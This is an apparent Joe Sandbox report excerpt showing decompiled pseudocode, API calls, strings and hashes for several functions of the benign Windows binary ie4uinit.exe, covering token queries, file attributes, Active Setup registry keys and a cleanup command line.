Function 00007FF7319E1258 Relevance: 10.6, APIs: 7, Instructions: 73
memoryCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF77FF7319E1258(void* __edx, void* __eflags, void* __rax, signed long long* __rcx, void* __r8, void* __r9, char _a16, void* _a24, void* _a32) {
				long long _v40;
				void* __rbx;
				void* __rsi;
				signed short _t22;
				void* _t51;
				intOrPtr* _t66;
				signed long long* _t67;
				void* _t68;

				 *__rcx =  *__rcx & 0x00000000;
				_t67 = __rcx;
				if (E00007FF77FF7319E11BC(__rax, _t51,  &_a24, __r8) < 0) goto 0x319e1342;
				GetProcessHeap();
				r9d = 0;
				r8d = 0;
				_v40 =  &_a16;
				if (GetTokenInformation(??, ??, ??, ??, ??) != 0) goto 0x319e12c3;
				E00007FF77FF7319E134C( &_a16, _a24, __rax, _a24, _t67, _t68,  &_a32,  &_a16);
				goto 0x319e12c8;
				if (0x8000ffff < 0) goto 0x319e1337;
				_t66 = _a32;
				if ( *_t66 <= 0) goto 0x319e1323;
				if (( *(_t66 + 0x10) & 0xc0000000) != 0) goto 0x319e12f4;
				if (1 -  *_t66 < 0) goto 0x319e12e0;
				goto 0x319e1323;
				__imp__ConvertSidToStringSidW();
				if (1 == 0) goto 0x319e130f;
				goto 0x319e1323;
				_t22 = GetLastError();
				_t34 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
				GetProcessHeap();
				HeapFree(??, ??, ??);
				CloseHandle(??);
				_t26 =  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
				return  <=  ? _t22 : _t22 & 0x0000ffff | 0x80070000;
			}

0x7ff7319e1260
0x7ff7319e1269
0x7ff7319e1275
0x7ff7319e1280
0x7ff7319e1286
0x7ff7319e1289
0x7ff7319e1297
0x7ff7319e12a8
0x7ff7319e12ba
0x7ff7319e12c1
0x7ff7319e12ca
0x7ff7319e12cc
0x7ff7319e12da
0x7ff7319e12e6
0x7ff7319e12f0
0x7ff7319e12f2
0x7ff7319e1301
0x7ff7319e1309
0x7ff7319e130d
0x7ff7319e130f
0x7ff7319e1320
0x7ff7319e1323
0x7ff7319e1331
0x7ff7319e133c
0x7ff7319e1342
0x7ff7319e134b

APIs

Part of subcall function 00007FF7319E11BC: GetCurrentThread.KERNEL32 ref: 00007FF7319E11CD
Part of subcall function 00007FF7319E11BC: OpenThreadToken.ADVAPI32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E11E0
Part of subcall function 00007FF7319E11BC: GetLastError.KERNEL32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E11EA
Part of subcall function 00007FF7319E11BC: GetCurrentProcess.KERNEL32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1210
Part of subcall function 00007FF7319E11BC: OpenProcessToken.ADVAPI32(?,?,?,00007FF7319E1271,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1221

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1280
GetTokenInformation.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E12A0
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7319E1301
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E130F
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1323
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1331
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E133C

Part of subcall function 00007FF7319E134C: GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E1370
Part of subcall function 00007FF7319E134C: HeapAlloc.KERNEL32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E138A
Part of subcall function 00007FF7319E134C: GetTokenInformation.ADVAPI32(?,?,?,?,00000000,00007FF7319E12BF,?,?,?,?,?,?,?,?,00000000,00007FF7319E0FF9), ref: 00007FF7319E13AB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: HeapProcessToken$ErrorLast$CurrentInformationOpenThread$AllocCloseConvertFreeHandleString
String ID:
API String ID: 1022525647-0
Opcode ID: 40c312d31ae8cbdccd5b1a64614ce69df1b073e18582d0e980ddb5b19a40b1a1
Instruction ID: e4033e095c830e066284ccd0e9b4c1aefae744958d182e672109db935e96b7b7
Opcode Fuzzy Hash: 40c312d31ae8cbdccd5b1a64614ce69df1b073e18582d0e980ddb5b19a40b1a1
Instruction Fuzzy Hash: 11218531F0C782A6E710AB65D98037DE390AF48BD8FC08531DE4D86658DFACE445A730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF77FF7319E0670(void* __eflags, long long __rbx, long long* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a16) {
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long long _v56;
				signed short _t26;
				signed short _t28;
				void* _t41;
				long long _t51;
				void* _t69;
				void* _t70;

				_t54 = __rcx;
				_a8 = __rbx;
				_a16 = __rsi;
				 *(__rcx + 0xc) = r9d;
				_t4 = _t54 + 0x10; // 0x10
				 *(__rcx + 8) = r9d;
				_t69 = __r8;
				if (E00007FF77FF7319C90F4(_t41, _t4, __rdx, __rdx, __r8, _t70) < 0) goto 0x319e0753;
				if (( *(__rcx + 0xc) & 0x00000005) == 0) goto 0x319e06d9;
				 *(__rcx + 8) =  *(__rcx + 8) & 0xfffffffa;
				if (SetFileAttributesW(??, ??) != 0) goto 0x319e06d9;
				_t26 = GetLastError();
				_t33 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
				_t47 =  <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000;
				if (( <=  ? _t26 : _t26 & 0x0000ffff | 0x80070000) < 0) goto 0x319e0753;
				_v28 = _v28 & 0x00000000;
				_t51 =  &_v40;
				r9d = 3;
				_v40 = 0x20;
				asm("xorps xmm0, xmm0");
				_v36 = 0x80;
				_v32 = 0x2000000;
				_v56 = _t51;
				r8d = _t69 + 1;
				asm("movdqu [esp+0x40], xmm0");
				__imp__CreateFile2();
				 *__rcx = _t51;
				if (_t51 != 0xffffffff) goto 0x319e0753;
				if ( *(__rcx + 0xc) ==  *(__rcx + 8)) goto 0x319e073f;
				SetFileAttributesW(??, ??);
				_t28 = GetLastError();
				_t36 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
				_t29 =  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
				return  <=  ? _t28 : _t28 & 0x0000ffff | 0x80070000;
			}

0x7ff7319e0670
0x7ff7319e0670
0x7ff7319e0675
0x7ff7319e067f
0x7ff7319e0683
0x7ff7319e0687
0x7ff7319e068e
0x7ff7319e06a5
0x7ff7319e06af
0x7ff7319e06b1
0x7ff7319e06c3
0x7ff7319e06c5
0x7ff7319e06d6
0x7ff7319e06d9
0x7ff7319e06db
0x7ff7319e06dd
0x7ff7319e06e2
0x7ff7319e06e7
0x7ff7319e06ed
0x7ff7319e06f5
0x7ff7319e06f8
0x7ff7319e0705
0x7ff7319e0710
0x7ff7319e0715
0x7ff7319e0719
0x7ff7319e071f
0x7ff7319e0725
0x7ff7319e072c
0x7ff7319e0734
0x7ff7319e0739
0x7ff7319e073f
0x7ff7319e0750
0x7ff7319e0758
0x7ff7319e0764

APIs

Part of subcall function 00007FF7319C90F4: LocalFree.KERNEL32 ref: 00007FF7319C9312

SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0154), ref: 00007FF7319E06BB
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7319E0154), ref: 00007FF7319E06C5
CreateFile2.KERNEL32 ref: 00007FF7319E071F
SetFileAttributesW.KERNEL32 ref: 00007FF7319E0739
GetLastError.KERNEL32 ref: 00007FF7319E073F

Strings

, xrefs: 00007FF7319E06ED

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AttributesErrorFileLast$CreateFile2FreeLocal
String ID:
API String ID: 2781035858-3916222277
Opcode ID: 75e005b9699e5455942652526394a3ab6485b3005affdd580e4356f9e02592a8
Instruction ID: 41279b8cae925e7018bf9213a3aa9e133a97c447aeda4c554eea93e72dfa9d86
Opcode Fuzzy Hash: 75e005b9699e5455942652526394a3ab6485b3005affdd580e4356f9e02592a8
Instruction Fuzzy Hash: 38219332F187C197E740AB15E98436AB390FB40BA8F54C330EB9943698DFBDE4518B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C3860 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32 ref: 00007FF7319C38B2
RegCloseKey.ADVAPI32 ref: 00007FF7319C38BD
RegCreateKeyExW.ADVAPI32 ref: 00007FF7319C38FD
RegSetValueExW.ADVAPI32 ref: 00007FF7319C392A
RegCloseKey.ADVAPI32 ref: 00007FF7319C3937

Strings

Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}, xrefs: 00007FF7319C38D8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseValue$CreateQuery
String ID: Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}
API String ID: 1259008579-2693928049
Opcode ID: fa3c6562d16f9ec3f27cc905cbd6113ed540c65d56b383c802243fa307ee1393
Instruction ID: 4b28319178a4beb9919ff68b8fea1b09d03d08f7910ce11b4e13f3dd2472e3b7
Opcode Fuzzy Hash: fa3c6562d16f9ec3f27cc905cbd6113ed540c65d56b383c802243fa307ee1393
Instruction Fuzzy Hash: 5E214A36A08BC196EB609F21F45475AB3A4FB88BA8F845131EACD43B18DFBCD545CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E1CA4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00007FF77FF7319E1CA4(void* __rax, long long __rbx, intOrPtr* __rcx, long long _a16, signed short* _a24, long long _a32, char _a40, intOrPtr _a44, void* _a48, signed short _a56, signed int _a4152, void* _a4192) {
				void* _t18;
				signed int _t19;
				signed int _t21;
				void* _t22;
				void* _t24;
				signed long long _t37;
				signed short* _t40;
				void* _t55;
				void* _t61;
				void* _t62;

				_a16 = __rbx;
				_t18 = E00007FF77FF7319E4200(0x1050, __rax, _t61, _t62);
				_t56 = _t55 - __rax;
				_t37 =  *0x319f4658; // 0x8be7dd1f02a
				_a4152 = _t37 ^ _t55 - __rax;
				_a40 = 0x1000;
				_a32 =  &_a40;
				_t40 =  &_a56;
				_a24 = _t40;
				 *((short*)(__rcx)) = 0;
				0x319e406a();
				if (_t18 != 0) goto 0x319e1d69;
				if (_a44 != 1) goto 0x319e1d69;
				_t19 = _a56 & 0x0000ffff;
				goto 0x319e1d3b;
				if (_t19 == 0x2c) goto 0x319e1d40;
				if (_t19 == 0x3b) goto 0x319e1d40;
				CharNextW(??);
				_t21 =  *_t40 & 0x0000ffff;
				if (_t21 != 0) goto 0x319e1d23;
				 *_t40 = 0;
				__imp__#123();
				if (_t21 < 0) goto 0x319e1d69;
				_t22 = E00007FF77FF7319C1310(__rcx, __rcx,  &_a56,  &_a56, _t61);
				if (0 !=  *__rcx) goto 0x319e1d7c;
				__imp__GetUserDefaultLocaleName();
				return E00007FF77FF7319E38D0(_t22, _t24, _a4152 ^ _t56);
			}

0x7ff7319e1ca4
0x7ff7319e1caf
0x7ff7319e1cb4
0x7ff7319e1cb7
0x7ff7319e1cc1
0x7ff7319e1cce
0x7ff7319e1cd6
0x7ff7319e1ce0
0x7ff7319e1cea
0x7ff7319e1cef
0x7ff7319e1d07
0x7ff7319e1d0e
0x7ff7319e1d15
0x7ff7319e1d17
0x7ff7319e1d21
0x7ff7319e1d27
0x7ff7319e1d2d
0x7ff7319e1d2f
0x7ff7319e1d38
0x7ff7319e1d3e
0x7ff7319e1d40
0x7ff7319e1d4d
0x7ff7319e1d55
0x7ff7319e1d64
0x7ff7319e1d6c
0x7ff7319e1d76
0x7ff7319e1d9c

APIs

SHGetValueW.SHLWAPI ref: 00007FF7319E1D07
CharNextW.USER32 ref: 00007FF7319E1D2F
#123.MLANG ref: 00007FF7319E1D4D
GetUserDefaultLocaleName.KERNEL32 ref: 00007FF7319E1D76

Strings

Software\Microsoft\Internet Explorer\International, xrefs: 00007FF7319E1CF9
AcceptLanguage, xrefs: 00007FF7319E1CF2

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #123CharDefaultLocaleNameNextUserValue
String ID: AcceptLanguage$Software\Microsoft\Internet Explorer\International
API String ID: 3091204316-784331173
Opcode ID: 82e52de1dba4405c66008f4613a68f563b53643b435c245afd9ada4c00769008
Instruction ID: 90014885d81a211aeb7934560adb0d730d9a69970a3b07359801915892785784
Opcode Fuzzy Hash: 82e52de1dba4405c66008f4613a68f563b53643b435c245afd9ada4c00769008
Instruction Fuzzy Hash: D7215331D0D6C2A5EB60AB14E4402EAF360FB84788FD09132EA8D4669CDFBDD585D730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CE00C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7319CE025
SysStringLen.OLEAUT32 ref: 00007FF7319CE03E
VarBstrCat.OLEAUT32 ref: 00007FF7319CE059
SysFreeString.OLEAUT32 ref: 00007FF7319CE068
SysFreeString.OLEAUT32 ref: 00007FF7319CE0C4

Strings

&pc=, xrefs: 00007FF7319CE01E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocBstr
String ID: &pc=
API String ID: 3761010647-3864277979
Opcode ID: f2a711594d89ea37a6fb04fef30606c5b4dd56d41889d6de13aa309feccaaa9f
Instruction ID: 99d4187e8900602991c9caa755890350ac477bb3768b5b4e46af2a2ac5b9cf9e
Opcode Fuzzy Hash: f2a711594d89ea37a6fb04fef30606c5b4dd56d41889d6de13aa309feccaaa9f
Instruction Fuzzy Hash: 41217422E1CA8692EB00EB12E450369E760EF84BC8F848035DA8F47B69CF7DD445D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0574 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319E0574(void* __eax, void* __r8) {
				signed int _v24;
				char _v552;
				char _v1080;
				signed int _v1096;
				long long _v1112;
				void* _t27;
				signed long long _t36;
				signed long long _t47;

				_t36 =  *0x319f4658; // 0x8be7dd1f02a
				_v24 = _t36 ^ _t47;
				r8d = 0;
				_v1096 = 1;
				_v1112 = 4;
				__imp__#654();
				if (__eax < 0) goto 0x319e0653;
				r8d = 0x104;
				if (ExpandEnvironmentStringsW(??, ??, ??) == 0) goto 0x319e062d;
				_v1112 = L"-CleanupEmeDataStores";
				if (E00007FF77FF7319C1394(_t18,  &_v552,  &_v1080, L"%s\\system32\\ie4uinit.exe %s",  &_v1080) < 0) goto 0x319e062d;
				if (E00007FF77FF7319C68FC(L"-CleanupEmeDataStores",  &_v552) >= 0) goto 0x319e0653;
				_v1096 = _v1096 & 0x00000000;
				r8d = 0;
				_v1112 = 4;
				__imp__#654();
				return E00007FF77FF7319E38D0(_t20, _t27, _v24 ^ _t47);
			}

0x7ff7319e057d
0x7ff7319e0587
0x7ff7319e059b
0x7ff7319e059e
0x7ff7319e05a6
0x7ff7319e05b2
0x7ff7319e05bc
0x7ff7319e05c2
0x7ff7319e05e1
0x7ff7319e05f4
0x7ff7319e0611
0x7ff7319e062b
0x7ff7319e062d
0x7ff7319e063e
0x7ff7319e0641
0x7ff7319e064d
0x7ff7319e066d

APIs

#654.IERTUTIL ref: 00007FF7319E05B2
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7319E05D9
#654.IERTUTIL ref: 00007FF7319E064D

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

Part of subcall function 00007FF7319C68FC: #654.IERTUTIL(?,?,?,?,?,?,00007FF7319DAC8F), ref: 00007FF7319C6925

Strings

-CleanupEmeDataStores, xrefs: 00007FF7319E05E3
%s\system32\ie4uinit.exe %s, xrefs: 00007FF7319E05F9
%windir%, xrefs: 00007FF7319E05CD

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #654$EnvironmentExpandStrings_vsnwprintf
String ID: %s\system32\ie4uinit.exe %s$%windir%$-CleanupEmeDataStores
API String ID: 3028992113-2826242292
Opcode ID: 40b2c27b4dd8a2bf901222e9343f66ee967b6b5a9d4fdc837f57397a1ff74fbe
Instruction ID: 3f4d885a1d02a66835dc4886aafa0eb2784e9505a6df5c8da94323acca2b000a
Opcode Fuzzy Hash: 40b2c27b4dd8a2bf901222e9343f66ee967b6b5a9d4fdc837f57397a1ff74fbe
Instruction Fuzzy Hash: 35211565F1D6C2A2F710EB10E8557A6A360FB8474CFC04132D68D46668DFBDE508DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB558 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00007FF77FF7319DB558(signed long long __rax, long long __rcx, signed int _a16) {
				void* __rbx;
				long _t12;
				void* _t15;
				long _t16;
				signed int _t19;
				void* _t40;
				void* _t41;

				_a16 = _a16 & 0x00000000;
				OpenMutexW(??, ??, ??);
				_a16 = __rax;
				if (__rax != 0) goto 0x319db5a0;
				E00007FF77FF7319DB5FC(__rax, __rcx, L"Local\\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa",  &_a16, _t40, _t41);
				goto 0x319db5a2;
				if (0 < 0) goto 0x319db5f6;
				asm("lock dec eax");
				if (0 == 0) goto 0x319db5f4;
				if (CloseHandle(??) != 0) goto 0x319db5f4;
				_t12 = GetLastError();
				_t13 =  ==  ? 1 : _t12;
				_t28 =  ==  ? 1 : _t12;
				if (( ==  ? 1 : _t12) > 0) goto 0x319db5df;
				_t15 =  ==  ? 1 : GetLastError();
				goto 0x319db5f6;
				_t16 = GetLastError();
				_t17 =  ==  ? 1 : _t16;
				_t18 = ( ==  ? 1 : _t16) & 0x0000ffff;
				_t19 = ( ==  ? 1 : _t16) & 0x0000ffff | 0x80070000;
				goto 0x319db5f6;
				return 0;
			}

0x7ff7319db55e
0x7ff7319db575
0x7ff7319db57b
0x7ff7319db586
0x7ff7319db594
0x7ff7319db59e
0x7ff7319db5a4
0x7ff7319db5a8
0x7ff7319db5ad
0x7ff7319db5bc
0x7ff7319db5be
0x7ff7319db5cb
0x7ff7319db5ce
0x7ff7319db5d0
0x7ff7319db5da
0x7ff7319db5dd
0x7ff7319db5df
0x7ff7319db5e7
0x7ff7319db5ea
0x7ff7319db5ed
0x7ff7319db5f2
0x7ff7319db5fb

APIs

OpenMutexW.KERNEL32 ref: 00007FF7319DB575
CloseHandle.KERNEL32 ref: 00007FF7319DB5B4
GetLastError.KERNEL32 ref: 00007FF7319DB5BE
GetLastError.KERNEL32 ref: 00007FF7319DB5D2

Part of subcall function 00007FF7319DB5FC: CreateMutexW.KERNEL32 ref: 00007FF7319DB620
Part of subcall function 00007FF7319DB5FC: #50.IERTUTIL ref: 00007FF7319DB635
Part of subcall function 00007FF7319DB5FC: GetCurrentProcess.KERNEL32 ref: 00007FF7319DB641
Part of subcall function 00007FF7319DB5FC: GetCurrentProcess.KERNEL32 ref: 00007FF7319DB64A
Part of subcall function 00007FF7319DB5FC: DuplicateHandle.KERNEL32 ref: 00007FF7319DB66E
Part of subcall function 00007FF7319DB5FC: CloseHandle.KERNEL32 ref: 00007FF7319DB6BA

GetLastError.KERNEL32 ref: 00007FF7319DB5DF

Strings

Local\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa, xrefs: 00007FF7319DB564, 00007FF7319DB58D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorHandleLast$CloseCurrentMutexProcess$CreateDuplicateOpen
String ID: Local\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa
API String ID: 3831808724-600561470
Opcode ID: 1eba9c7770c4911a21616fb2a1f726ecb7f0e6bc2a1f79f8a7e266fa825036e4
Instruction ID: bcfdc40431bf1d92100ca2dce4dbc96e6038b7a6a6de5033a0dd6e86c2a2d495
Opcode Fuzzy Hash: 1eba9c7770c4911a21616fb2a1f726ecb7f0e6bc2a1f79f8a7e266fa825036e4
Instruction Fuzzy Hash: 65111261F1DAC791EB80AB66D888376E3949F48758FC44038D50FC1158EE9CE484A730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D8D00 Relevance: 9.1, APIs: 6, Instructions: 149COMMON

Download Yara Rule

APIs

#662.IERTUTIL ref: 00007FF7319D8D92
#665.IERTUTIL ref: 00007FF7319D8DBC
#655.IERTUTIL ref: 00007FF7319D8DF9
#657.IERTUTIL ref: 00007FF7319D8EEE
#657.IERTUTIL ref: 00007FF7319D8F2C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #657$#655#662#665
String ID:
API String ID: 3924366864-0
Opcode ID: 03fd8868a43416aeabdefa7b576575837b6c353f7b9af5c7e7ec3a9296bf4931
Instruction ID: c4898028bf068ff573a57cdf90a76a7ad553088ebfd4e76a49c5c4a3c5a0bef2
Opcode Fuzzy Hash: 03fd8868a43416aeabdefa7b576575837b6c353f7b9af5c7e7ec3a9296bf4931
Instruction Fuzzy Hash: E951A323E0C682A6E720AF15E4487AAF760FB84788FC04075DB8D43669CFBDE445DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E19F4 Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF77FF7319E19F4(void* __eax, void* __esi, short* __rcx, void* __rdx, void* __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t35;
				void* _t36;
				signed int _t51;
				void* _t54;
				signed long long _t66;
				void* _t73;
				short* _t89;
				void* _t91;
				void* _t92;
				signed long long _t93;
				void* _t102;

				_t54 = __esi;
				_t91 = _t92 - 0x200;
				_t93 = _t92 - 0x300;
				_t66 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t91 + 0x1f0) = _t66 ^ _t93;
				 *((intOrPtr*)(_t93 + 0x38)) = r8d;
				r14d = 0;
				 *((long long*)(_t91 - 0x38)) = _t93 + 0x40;
				 *((intOrPtr*)(_t93 + 0x40)) = r14w;
				_t89 = __rcx;
				 *(_t91 - 0x30) = 0x41;
				__imp__PathIsURLW();
				if (__eax == 0) goto 0x319e1a65;
				if (__r9 == __rcx) goto 0x319e1a5d;
				E00007FF77FF7319C1310(_t73, __r9, __rdx, __rcx, _t102);
				goto 0x319e1b3f;
				if ( *((intOrPtr*)(__rcx)) == r14w) goto 0x319e1b68;
				if ( *__rcx == 0x5c) goto 0x319e1a87;
				if ( *((short*)(__rcx + 2)) == 0x3a) goto 0x319e1a87;
				if ( *((short*)(__rcx + 2)) != 0x7c) goto 0x319e1b68;
